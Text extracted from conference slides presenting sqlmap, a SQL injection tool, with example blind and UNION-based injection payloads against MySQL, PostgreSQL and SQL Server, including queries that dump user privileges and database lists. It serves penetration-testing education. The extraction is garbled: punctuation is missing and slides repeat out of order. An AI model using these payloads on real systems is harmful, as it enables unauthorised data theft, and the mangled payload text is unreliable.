Intercon III London ndash January 9 2009 29
Back-end DBMS fingerprinting is a mandatory step to go through to take full advantage of a SQL injection flaw
There are a few well known techniques and a few over-looked techniques
sqlmap implements up to four techniques three of these are in use by other tools
The user can force the back-end DBMS software value no HTTP requests are sent to identify the software
By default a basic DBMS fingerprint based on one or two techniques is done only two HTTP requests are sent
The user can choose to perform an extensive DBMS fingerprint based on four techniques numerous (30+) HTTP requests are sent
DBMS fingerprint (14)
Intercon III London ndash January 9 2009 30
The techniques implemented to perform an extensive back-end DBMS fingerprint are
Inband error messages
Banner parsing
SQL dialect
Specific functions static output comparison
On a default installation all of them are reliable
On a hardened installation the last two are reliable
DBMS fingerprint (24)
Intercon III London ndash January 9 2009 31
Example of basic back-end DBMS fingerprint on PostgreSQL 83
The techniques in use are two
The two SQL queries injected to identify it are
AND integerint=integer
SQL dialect
AND COALESCE(integer NULL)=integer
Specific function static output comparison
DBMS fingerprint (34)
Intercon III London ndash January 9 2009 32
Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005
The techniques in use are three
The result is
active fingerprint Microsoft SQL Server 2005banner parsing fingerprint Microsoft SQL Server 2005 Service Pack 0 version 9001399html error message fingerprint Microsoft SQL Server
Active fingerprint refers to SQL dialect and specific functions static output comparison
DBMS fingerprint (44)
Intercon III London ndash January 9 2009 33
Fingerprinting is a key step in penetration testing
It is not only about back-end DBMS software
There are techniques and tools to fingerprint the web server the web application technology and their underlying system
What about the back-end DBMS underlying system
sqlmap can fingerprint them without making extra requests
Webapplication server and web application technology by parsing the HTTP response headers (Server X-AspNet-Version X-Powered-By etc) ndash known technique
Back-end DBMS operating system by parsing the DBMS banner ndash over-looked technique
More on fingerprint
Intercon III London ndash January 9 2009 34
Second demo
A demo as in demolish or demonstrationCyclops X-Men Evolution
Intercon III London ndash January 9 2009 35
It might comes in handy sometimes to be able to run your own SQL queries mainly for file system read and write access and operating system command execution
The tool inspects the provided statement
If it is a SELECT statement sqlmap uses depending on users options the inferential blind or the UNION query technique to retrieve its output
If it is a data manipulation statement a transaction statement or any other valid SQL statement it uses stacked queries to run it if the web application supports them
Give me a SQL shell
Intercon III London ndash January 9 2009 36
Automation vs granularity (12)sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications
Providing it with a source of targets it can automatically
Detect all possible SQL injections and confirm them
Identify the SQL query syntax
Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS specific queries then manually inject them to enumerate users password hashes check if the session user is a DBA enumerate table columns datatype etc
There is an option to dump the whole back-end DBMS
Intercon III London ndash January 9 2009 37
Automation vs granularity (22) The tester is a professional he knows what he does and why
There are options to specify
How to compare True and False HTTP responses
A single or more testable parameters
The SQL payload prefix and postfix
A single or a range of entries to dump from a table
A single or multiple columns to dump from a table
Custom SQL statements to run
Options can be specified from both command line andor configuration file
Options are documented in the users manual with examples
Intercon III London ndash January 9 2009 38
Third demo
I get tons of uninteresting mail and system announcements about babies born etc At least a
demo MIGHT have been interestingRichard Stallman
Intercon III London ndash January 9 2009 39
LimitationsCan sqlmap fail to detect or to exploit a SQL injection vulnerability
Yes in some cases mainly because it does not support
SQL injection on SQL clauses other than WHERE
Time based blind SQL injection technique
but I am working on these and others
Intercon III London ndash January 9 2009 40
Want to contributeI am always looking forward to code contributions
Try it find bugs send feature requests review the code and the documentation contribute on the mailing lists
I can provide you with
Details on code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in London area
Intercon III London ndash January 9 2009 41
Links and contactsHomepage httpsqlmapsourceforgenet
Documentation
httpsqlmapsourceforgenetdevindexhtml
httpsqlmapsourceforgenetdocREADMEpdf
Mailing lists
httpslistssourceforgenetlistslistinfosqlmap-users
httpslistssourceforgenetlistslistinfosqlmap-devel
Personal contacts
E-mail Jabber bernardodamelegmailcom
Blog httpbernardodameleblogspotcom
Intercon III London ndash January 9 2009 42
References OWASP Testing Guide Open Web Application Security Project
Exploit of a Mom xkcd
Deep Blind SQL Injection Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework H D Moore and the Metasploit development team
w3af Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference David Litchfield (NGS Software)
Advanced SQL Injection Victor Chapela (Sm4rt Security Services)
Python difflib Python Software Foundation
NULL (SQL) Wikipedia
Agent oriented SQL abuse Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection Bernardo Damele A G
DBMS Fingerprint Daniele Bellucci (OWASP Backend Security Project)
Intercon III London ndash January 9 2009 43
Questions
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-
Intercon III London ndash January 9 2009 14
In standard SQL language NULL is allowed as a value for a table column field
In the inferential blind SQL injection technique usually a bisection algorithm is used to identify if the ordinal value of the Nth query output character is higher of a certain ASCII table number this causes the page content to be True or False
The SQL statement used by sqlmap depending on the back-end DBMS is similar to
ASCII(SUBSTR((SQL query) Nth SQL query output char 1)) gt Bisection algorithm number
To NULL or not to NULL (14)
Intercon III London ndash January 9 2009 15
Obstacle
On some DBMS the substring function can not be used on NULL
To NULL or not to NULL (24)
Intercon III London ndash January 9 2009 16
A possible solution for this problem consists in modifying all SQL querys columns explicitly
Casting its output to be a string
Returning value (space) if the casted value is still NULL
Example on MySQL 50 The SQL query to enumerate the column name first entry is
SELECT name FROM testusers LIMIT 0 1
Casted SQL query
SELECT IFNULL(CAST(name AS CHAR(10000)) CHAR(32)) FROM testusers LIMIT 0 1
To NULL or not to NULL (34)
Intercon III London ndash January 9 2009 17
The inferential blind SQL injected statement will be then
ORD(MID((SELECT IFNULL(CAST(name AS CHAR(10000)) CHAR(32)) FROM testusers LIMIT 0 1) Nth SQL query output character 1)) gt Bisection algorithm number
URL encoded
ORD28MID2828SELECT20IFNULL28CAST28name20AS20CHAR281000029292C20CHAR2832292920FROM20testusers20LIMIT2002C201292C2012C2012929203E2063
To NULL or not to NULL (44)
Intercon III London ndash January 9 2009 18
You have got an injection point
The injection point is in a SQL statement as follows
SELECT FROM users WHERE id LIKE ((( $_GET[id] ))) LIMIT 0 1
SQL payload (13)
Intercon III London ndash January 9 2009 19
Obstacle
The injection is after a LIKE clause within three parenthesis the statement terminates with a LIMIT clause
SQL payload (23)
Intercon III London ndash January 9 2009 20
In this example the SQL payload that sqlmap identifies is
id=1))) AND (((RaNd LIKE RaNd
In the inferential blind SQL injection algorithm will be
id=1))) AND ORD(MID((SQL query) Nth SQL query output character 1)) gt Bisection algorithm number AND (((RaNd LIKE RaNd
In the UNION query SQL injection technique will be
id=1))) UNION ALL SELECT NULL Concatenated SQL query NULL AND (((RaNd LIKE RaNd
SQL payload (33)
Intercon III London ndash January 9 2009 21
First demo
I did every demo possible to see if the things would do what they were promising they would do
Doug Hall
Intercon III London ndash January 9 2009 22
You have got an injection point
It is vulnerable to UNION query SQL injection
sqlmap detected it for you by NULL bruteforcing or by ORDER BY clause bruteforcing depending on your options
Bypass columns limitation (14)
Intercon III London ndash January 9 2009 23
Obstacle
The number of columns in the web application SELECT statement is lower than the number of columns of your UNION ALL SELECT statement
Bypass columns limitation (24)
Intercon III London ndash January 9 2009 24
A possible solution consists in concatenating your SELECT statement columns in a single output by using the specific DBMS string concatenation operator or function
Example on PostgreSQL 83 to retrieve users privileges
The SQL query to inject is
SELECT usename usecreatedb usesuper usecatupd FROM pg_user
Bypass columns limitation (34)
Intercon III London ndash January 9 2009 25
The injection will be
UNION ALL SELECT NULL CHR(83)||CHR(114)||CHR(108)||CHR(71)||CHR(86)||CHR(116)||COALESCE(CAST(usename AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecreatedb AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usesuper AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecatupd AS CHARACTER(10000)) CHR(32))||CHR(75)||CHR(121)||CHR(80)||CHR(65)||CHR(68)||CHR(102) NULL FROM pg_usershyshy
Bypass columns limitation (44)
Intercon III London ndash January 9 2009 26
Obstacle
You have got an injection point vulnerable to UNION query SQL injection Only the query outputs first entry or a range of entries is displayed in the page content
Going partial UNION (13)
Intercon III London ndash January 9 2009 27
sqlmap automatizes a known technique
Changes the parameter value to its negative value causing the original query to produce no output
Inspects and unpack the provided SQL statement
Calculates its output number of entries
Limits it after the UNION ALL SELECT to return one entry at a time
Repeat the previous action N times where N is equal to the number of entries
Going partial UNION (23)
Intercon III London ndash January 9 2009 28
Example on MySQL 41 to enumerate list of databases
The SQL query to inject is
SELECT db FROM mysqldb
sqlmap identified the injection point as being an non-quoted parameter (integer) in the WHERE clause with the equal operator (simple scenario)
The injection will be
id=shy1 UNION ALL SELECT NULL CONCAT(CHAR(1008471698798)IFNULL(CAST(db AS CHAR(10000)) CHAR(32)) CHAR(65831188187116)) NULL FROM mysqldb LIMIT 0 1 AND 6972=6972
Going partial UNION (33)
Intercon III London ndash January 9 2009 29
Back-end DBMS fingerprinting is a mandatory step to go through to take full advantage of a SQL injection flaw
There are a few well known techniques and a few over-looked techniques
sqlmap implements up to four techniques three of these are in use by other tools
The user can force the back-end DBMS software value no HTTP requests are sent to identify the software
By default a basic DBMS fingerprint based on one or two techniques is done only two HTTP requests are sent
The user can choose to perform an extensive DBMS fingerprint based on four techniques numerous (30+) HTTP requests are sent
DBMS fingerprint (14)
Intercon III London ndash January 9 2009 30
The techniques implemented to perform an extensive back-end DBMS fingerprint are
Inband error messages
Banner parsing
SQL dialect
Specific functions static output comparison
On a default installation all of them are reliable
On a hardened installation the last two are reliable
DBMS fingerprint (24)
Intercon III London ndash January 9 2009 31
Example of basic back-end DBMS fingerprint on PostgreSQL 83
The techniques in use are two
The two SQL queries injected to identify it are
AND integerint=integer
SQL dialect
AND COALESCE(integer NULL)=integer
Specific function static output comparison
DBMS fingerprint (34)
Intercon III London ndash January 9 2009 32
Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005
The techniques in use are three
The result is
active fingerprint Microsoft SQL Server 2005banner parsing fingerprint Microsoft SQL Server 2005 Service Pack 0 version 9001399html error message fingerprint Microsoft SQL Server
Active fingerprint refers to SQL dialect and specific functions static output comparison
DBMS fingerprint (44)
Intercon III London ndash January 9 2009 33
Fingerprinting is a key step in penetration testing
It is not only about back-end DBMS software
There are techniques and tools to fingerprint the web server the web application technology and their underlying system
What about the back-end DBMS underlying system
sqlmap can fingerprint them without making extra requests
Webapplication server and web application technology by parsing the HTTP response headers (Server X-AspNet-Version X-Powered-By etc) ndash known technique
Back-end DBMS operating system by parsing the DBMS banner ndash over-looked technique
More on fingerprint
Intercon III London ndash January 9 2009 34
Second demo
A demo as in demolish or demonstrationCyclops X-Men Evolution
Intercon III London ndash January 9 2009 35
It might comes in handy sometimes to be able to run your own SQL queries mainly for file system read and write access and operating system command execution
The tool inspects the provided statement
If it is a SELECT statement sqlmap uses depending on users options the inferential blind or the UNION query technique to retrieve its output
If it is a data manipulation statement a transaction statement or any other valid SQL statement it uses stacked queries to run it if the web application supports them
Give me a SQL shell
Intercon III London ndash January 9 2009 36
Automation vs granularity (12)sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications
Providing it with a source of targets it can automatically
Detect all possible SQL injections and confirm them
Identify the SQL query syntax
Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS specific queries then manually inject them to enumerate users password hashes check if the session user is a DBA enumerate table columns datatype etc
There is an option to dump the whole back-end DBMS
Intercon III London ndash January 9 2009 37
Automation vs granularity (22) The tester is a professional he knows what he does and why
There are options to specify
How to compare True and False HTTP responses
A single or more testable parameters
The SQL payload prefix and postfix
A single or a range of entries to dump from a table
A single or multiple columns to dump from a table
Custom SQL statements to run
Options can be specified from both command line andor configuration file
Options are documented in the users manual with examples
Intercon III London ndash January 9 2009 38
Third demo
I get tons of uninteresting mail and system announcements about babies born etc At least a
demo MIGHT have been interestingRichard Stallman
Intercon III London ndash January 9 2009 39
LimitationsCan sqlmap fail to detect or to exploit a SQL injection vulnerability
Yes in some cases mainly because it does not support
SQL injection on SQL clauses other than WHERE
Time based blind SQL injection technique
but I am working on these and others
Intercon III London ndash January 9 2009 40
Want to contributeI am always looking forward to code contributions
Try it find bugs send feature requests review the code and the documentation contribute on the mailing lists
I can provide you with
Details on code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in London area
Intercon III London ndash January 9 2009 41
Links and contactsHomepage httpsqlmapsourceforgenet
Documentation
httpsqlmapsourceforgenetdevindexhtml
httpsqlmapsourceforgenetdocREADMEpdf
Mailing lists
httpslistssourceforgenetlistslistinfosqlmap-users
httpslistssourceforgenetlistslistinfosqlmap-devel
Personal contacts
E-mail Jabber bernardodamelegmailcom
Blog httpbernardodameleblogspotcom
Intercon III London ndash January 9 2009 42
References OWASP Testing Guide Open Web Application Security Project
Exploit of a Mom xkcd
Deep Blind SQL Injection Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework H D Moore and the Metasploit development team
w3af Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference David Litchfield (NGS Software)
Advanced SQL Injection Victor Chapela (Sm4rt Security Services)
Python difflib Python Software Foundation
NULL (SQL) Wikipedia
Agent oriented SQL abuse Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection Bernardo Damele A G
DBMS Fingerprint Daniele Bellucci (OWASP Backend Security Project)
Intercon III London ndash January 9 2009 43
Questions
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-
Intercon III London ndash January 9 2009 15
Obstacle
On some DBMS the substring function can not be used on NULL
To NULL or not to NULL (24)
Intercon III London ndash January 9 2009 16
A possible solution for this problem consists in modifying all SQL querys columns explicitly
Casting its output to be a string
Returning value (space) if the casted value is still NULL
Example on MySQL 50 The SQL query to enumerate the column name first entry is
SELECT name FROM testusers LIMIT 0 1
Casted SQL query
SELECT IFNULL(CAST(name AS CHAR(10000)) CHAR(32)) FROM testusers LIMIT 0 1
To NULL or not to NULL (34)
Intercon III London ndash January 9 2009 17
The inferential blind SQL injected statement will be then
ORD(MID((SELECT IFNULL(CAST(name AS CHAR(10000)) CHAR(32)) FROM testusers LIMIT 0 1) Nth SQL query output character 1)) gt Bisection algorithm number
URL encoded
ORD28MID2828SELECT20IFNULL28CAST28name20AS20CHAR281000029292C20CHAR2832292920FROM20testusers20LIMIT2002C201292C2012C2012929203E2063
To NULL or not to NULL (44)
Intercon III London ndash January 9 2009 18
You have got an injection point
The injection point is in a SQL statement as follows
SELECT FROM users WHERE id LIKE ((( $_GET[id] ))) LIMIT 0 1
SQL payload (13)
Intercon III London ndash January 9 2009 19
Obstacle
The injection is after a LIKE clause within three parenthesis the statement terminates with a LIMIT clause
SQL payload (23)
Intercon III London ndash January 9 2009 20
In this example the SQL payload that sqlmap identifies is
id=1))) AND (((RaNd LIKE RaNd
In the inferential blind SQL injection algorithm will be
id=1))) AND ORD(MID((SQL query) Nth SQL query output character 1)) gt Bisection algorithm number AND (((RaNd LIKE RaNd
In the UNION query SQL injection technique will be
id=1))) UNION ALL SELECT NULL Concatenated SQL query NULL AND (((RaNd LIKE RaNd
SQL payload (33)
Intercon III London ndash January 9 2009 21
First demo
I did every demo possible to see if the things would do what they were promising they would do
Doug Hall
Intercon III London ndash January 9 2009 22
You have got an injection point
It is vulnerable to UNION query SQL injection
sqlmap detected it for you by NULL bruteforcing or by ORDER BY clause bruteforcing depending on your options
Bypass columns limitation (14)
Intercon III London ndash January 9 2009 23
Obstacle
The number of columns in the web application SELECT statement is lower than the number of columns of your UNION ALL SELECT statement
Bypass columns limitation (24)
Intercon III London ndash January 9 2009 24
A possible solution consists in concatenating your SELECT statement columns in a single output by using the specific DBMS string concatenation operator or function
Example on PostgreSQL 83 to retrieve users privileges
The SQL query to inject is
SELECT usename usecreatedb usesuper usecatupd FROM pg_user
Bypass columns limitation (34)
Intercon III London ndash January 9 2009 25
The injection will be
UNION ALL SELECT NULL CHR(83)||CHR(114)||CHR(108)||CHR(71)||CHR(86)||CHR(116)||COALESCE(CAST(usename AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecreatedb AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usesuper AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecatupd AS CHARACTER(10000)) CHR(32))||CHR(75)||CHR(121)||CHR(80)||CHR(65)||CHR(68)||CHR(102) NULL FROM pg_usershyshy
Bypass columns limitation (44)
Intercon III London ndash January 9 2009 26
Obstacle
You have got an injection point vulnerable to UNION query SQL injection Only the query outputs first entry or a range of entries is displayed in the page content
Going partial UNION (13)
Intercon III London ndash January 9 2009 27
sqlmap automatizes a known technique
Changes the parameter value to its negative value causing the original query to produce no output
Inspects and unpack the provided SQL statement
Calculates its output number of entries
Limits it after the UNION ALL SELECT to return one entry at a time
Repeat the previous action N times where N is equal to the number of entries
Going partial UNION (23)
Intercon III London ndash January 9 2009 28
Example on MySQL 41 to enumerate list of databases
The SQL query to inject is
SELECT db FROM mysqldb
sqlmap identified the injection point as being an non-quoted parameter (integer) in the WHERE clause with the equal operator (simple scenario)
The injection will be
id=shy1 UNION ALL SELECT NULL CONCAT(CHAR(1008471698798)IFNULL(CAST(db AS CHAR(10000)) CHAR(32)) CHAR(65831188187116)) NULL FROM mysqldb LIMIT 0 1 AND 6972=6972
Going partial UNION (33)
Intercon III London ndash January 9 2009 29
Back-end DBMS fingerprinting is a mandatory step to go through to take full advantage of a SQL injection flaw
There are a few well known techniques and a few over-looked techniques
sqlmap implements up to four techniques three of these are in use by other tools
The user can force the back-end DBMS software value no HTTP requests are sent to identify the software
By default a basic DBMS fingerprint based on one or two techniques is done only two HTTP requests are sent
The user can choose to perform an extensive DBMS fingerprint based on four techniques numerous (30+) HTTP requests are sent
DBMS fingerprint (14)
Intercon III London ndash January 9 2009 30
The techniques implemented to perform an extensive back-end DBMS fingerprint are
Inband error messages
Banner parsing
SQL dialect
Specific functions static output comparison
On a default installation all of them are reliable
On a hardened installation the last two are reliable
DBMS fingerprint (24)
Intercon III London ndash January 9 2009 31
Example of basic back-end DBMS fingerprint on PostgreSQL 83
The techniques in use are two
The two SQL queries injected to identify it are
AND integerint=integer
SQL dialect
AND COALESCE(integer NULL)=integer
Specific function static output comparison
DBMS fingerprint (34)
Intercon III London ndash January 9 2009 32
Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005
The techniques in use are three
The result is
active fingerprint Microsoft SQL Server 2005banner parsing fingerprint Microsoft SQL Server 2005 Service Pack 0 version 9001399html error message fingerprint Microsoft SQL Server
Active fingerprint refers to SQL dialect and specific functions static output comparison
DBMS fingerprint (44)
Intercon III London ndash January 9 2009 33
Fingerprinting is a key step in penetration testing
It is not only about back-end DBMS software
There are techniques and tools to fingerprint the web server the web application technology and their underlying system
What about the back-end DBMS underlying system
sqlmap can fingerprint them without making extra requests
Webapplication server and web application technology by parsing the HTTP response headers (Server X-AspNet-Version X-Powered-By etc) ndash known technique
Back-end DBMS operating system by parsing the DBMS banner ndash over-looked technique
More on fingerprint
Intercon III London ndash January 9 2009 34
Second demo
A demo as in demolish or demonstrationCyclops X-Men Evolution
Intercon III London ndash January 9 2009 35
It might comes in handy sometimes to be able to run your own SQL queries mainly for file system read and write access and operating system command execution
The tool inspects the provided statement
If it is a SELECT statement sqlmap uses depending on users options the inferential blind or the UNION query technique to retrieve its output
If it is a data manipulation statement a transaction statement or any other valid SQL statement it uses stacked queries to run it if the web application supports them
Give me a SQL shell
Intercon III London ndash January 9 2009 36
Automation vs granularity (12)sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications
Providing it with a source of targets it can automatically
Detect all possible SQL injections and confirm them
Identify the SQL query syntax
Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS specific queries then manually inject them to enumerate users password hashes check if the session user is a DBA enumerate table columns datatype etc
There is an option to dump the whole back-end DBMS
Intercon III London ndash January 9 2009 37
Automation vs granularity (22) The tester is a professional he knows what he does and why
There are options to specify
How to compare True and False HTTP responses
A single or more testable parameters
The SQL payload prefix and postfix
A single or a range of entries to dump from a table
A single or multiple columns to dump from a table
Custom SQL statements to run
Options can be specified from both command line andor configuration file
Options are documented in the users manual with examples
Intercon III London ndash January 9 2009 38
Third demo
I get tons of uninteresting mail and system announcements about babies born etc At least a
demo MIGHT have been interestingRichard Stallman
Intercon III London ndash January 9 2009 39
LimitationsCan sqlmap fail to detect or to exploit a SQL injection vulnerability
Yes in some cases mainly because it does not support
SQL injection on SQL clauses other than WHERE
Time based blind SQL injection technique
but I am working on these and others
Intercon III London ndash January 9 2009 40
Want to contributeI am always looking forward to code contributions
Try it find bugs send feature requests review the code and the documentation contribute on the mailing lists
I can provide you with
Details on code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in London area
Intercon III London ndash January 9 2009 41
Links and contactsHomepage httpsqlmapsourceforgenet
Documentation
httpsqlmapsourceforgenetdevindexhtml
httpsqlmapsourceforgenetdocREADMEpdf
Mailing lists
httpslistssourceforgenetlistslistinfosqlmap-users
httpslistssourceforgenetlistslistinfosqlmap-devel
Personal contacts
E-mail Jabber bernardodamelegmailcom
Blog httpbernardodameleblogspotcom
Intercon III London ndash January 9 2009 42
References OWASP Testing Guide Open Web Application Security Project
Exploit of a Mom xkcd
Deep Blind SQL Injection Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework H D Moore and the Metasploit development team
w3af Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference David Litchfield (NGS Software)
Advanced SQL Injection Victor Chapela (Sm4rt Security Services)
Python difflib Python Software Foundation
NULL (SQL) Wikipedia
Agent oriented SQL abuse Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection Bernardo Damele A G
DBMS Fingerprint Daniele Bellucci (OWASP Backend Security Project)
Intercon III London ndash January 9 2009 43
Questions
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-
Intercon III London ndash January 9 2009 16
A possible solution for this problem consists in modifying all SQL querys columns explicitly
Casting its output to be a string
Returning value (space) if the casted value is still NULL
Example on MySQL 50 The SQL query to enumerate the column name first entry is
SELECT name FROM testusers LIMIT 0 1
Casted SQL query
SELECT IFNULL(CAST(name AS CHAR(10000)) CHAR(32)) FROM testusers LIMIT 0 1
To NULL or not to NULL (34)
Intercon III London ndash January 9 2009 17
The inferential blind SQL injected statement will be then
ORD(MID((SELECT IFNULL(CAST(name AS CHAR(10000)) CHAR(32)) FROM testusers LIMIT 0 1) Nth SQL query output character 1)) gt Bisection algorithm number
URL encoded
ORD28MID2828SELECT20IFNULL28CAST28name20AS20CHAR281000029292C20CHAR2832292920FROM20testusers20LIMIT2002C201292C2012C2012929203E2063
To NULL or not to NULL (44)
Intercon III London ndash January 9 2009 18
You have got an injection point
The injection point is in a SQL statement as follows
SELECT FROM users WHERE id LIKE ((( $_GET[id] ))) LIMIT 0 1
SQL payload (13)
Intercon III London ndash January 9 2009 19
Obstacle
The injection is after a LIKE clause within three parenthesis the statement terminates with a LIMIT clause
SQL payload (23)
Intercon III London ndash January 9 2009 20
In this example the SQL payload that sqlmap identifies is
id=1))) AND (((RaNd LIKE RaNd
In the inferential blind SQL injection algorithm will be
id=1))) AND ORD(MID((SQL query) Nth SQL query output character 1)) gt Bisection algorithm number AND (((RaNd LIKE RaNd
In the UNION query SQL injection technique will be
id=1))) UNION ALL SELECT NULL Concatenated SQL query NULL AND (((RaNd LIKE RaNd
SQL payload (33)
Intercon III London ndash January 9 2009 21
First demo
I did every demo possible to see if the things would do what they were promising they would do
Doug Hall
Intercon III London ndash January 9 2009 22
You have got an injection point
It is vulnerable to UNION query SQL injection
sqlmap detected it for you by NULL bruteforcing or by ORDER BY clause bruteforcing depending on your options
Bypass columns limitation (14)
Intercon III London ndash January 9 2009 23
Obstacle
The number of columns in the web application SELECT statement is lower than the number of columns of your UNION ALL SELECT statement
Bypass columns limitation (24)
Intercon III London ndash January 9 2009 24
A possible solution consists in concatenating your SELECT statement columns in a single output by using the specific DBMS string concatenation operator or function
Example on PostgreSQL 83 to retrieve users privileges
The SQL query to inject is
SELECT usename usecreatedb usesuper usecatupd FROM pg_user
Bypass columns limitation (34)
Intercon III London ndash January 9 2009 25
The injection will be
UNION ALL SELECT NULL CHR(83)||CHR(114)||CHR(108)||CHR(71)||CHR(86)||CHR(116)||COALESCE(CAST(usename AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecreatedb AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usesuper AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecatupd AS CHARACTER(10000)) CHR(32))||CHR(75)||CHR(121)||CHR(80)||CHR(65)||CHR(68)||CHR(102) NULL FROM pg_usershyshy
Bypass columns limitation (44)
Intercon III London ndash January 9 2009 26
Obstacle
You have got an injection point vulnerable to UNION query SQL injection Only the query outputs first entry or a range of entries is displayed in the page content
Going partial UNION (13)
Intercon III London ndash January 9 2009 27
sqlmap automatizes a known technique
Changes the parameter value to its negative value causing the original query to produce no output
Inspects and unpack the provided SQL statement
Calculates its output number of entries
Limits it after the UNION ALL SELECT to return one entry at a time
Repeat the previous action N times where N is equal to the number of entries
Going partial UNION (23)
Intercon III London ndash January 9 2009 28
Example on MySQL 41 to enumerate list of databases
The SQL query to inject is
SELECT db FROM mysqldb
sqlmap identified the injection point as being an non-quoted parameter (integer) in the WHERE clause with the equal operator (simple scenario)
The injection will be
id=shy1 UNION ALL SELECT NULL CONCAT(CHAR(1008471698798)IFNULL(CAST(db AS CHAR(10000)) CHAR(32)) CHAR(65831188187116)) NULL FROM mysqldb LIMIT 0 1 AND 6972=6972
Going partial UNION (33)
Intercon III London ndash January 9 2009 29
Back-end DBMS fingerprinting is a mandatory step to go through to take full advantage of a SQL injection flaw
There are a few well known techniques and a few over-looked techniques
sqlmap implements up to four techniques three of these are in use by other tools
The user can force the back-end DBMS software value no HTTP requests are sent to identify the software
By default a basic DBMS fingerprint based on one or two techniques is done only two HTTP requests are sent
The user can choose to perform an extensive DBMS fingerprint based on four techniques numerous (30+) HTTP requests are sent
DBMS fingerprint (14)
Intercon III London ndash January 9 2009 30
The techniques implemented to perform an extensive back-end DBMS fingerprint are
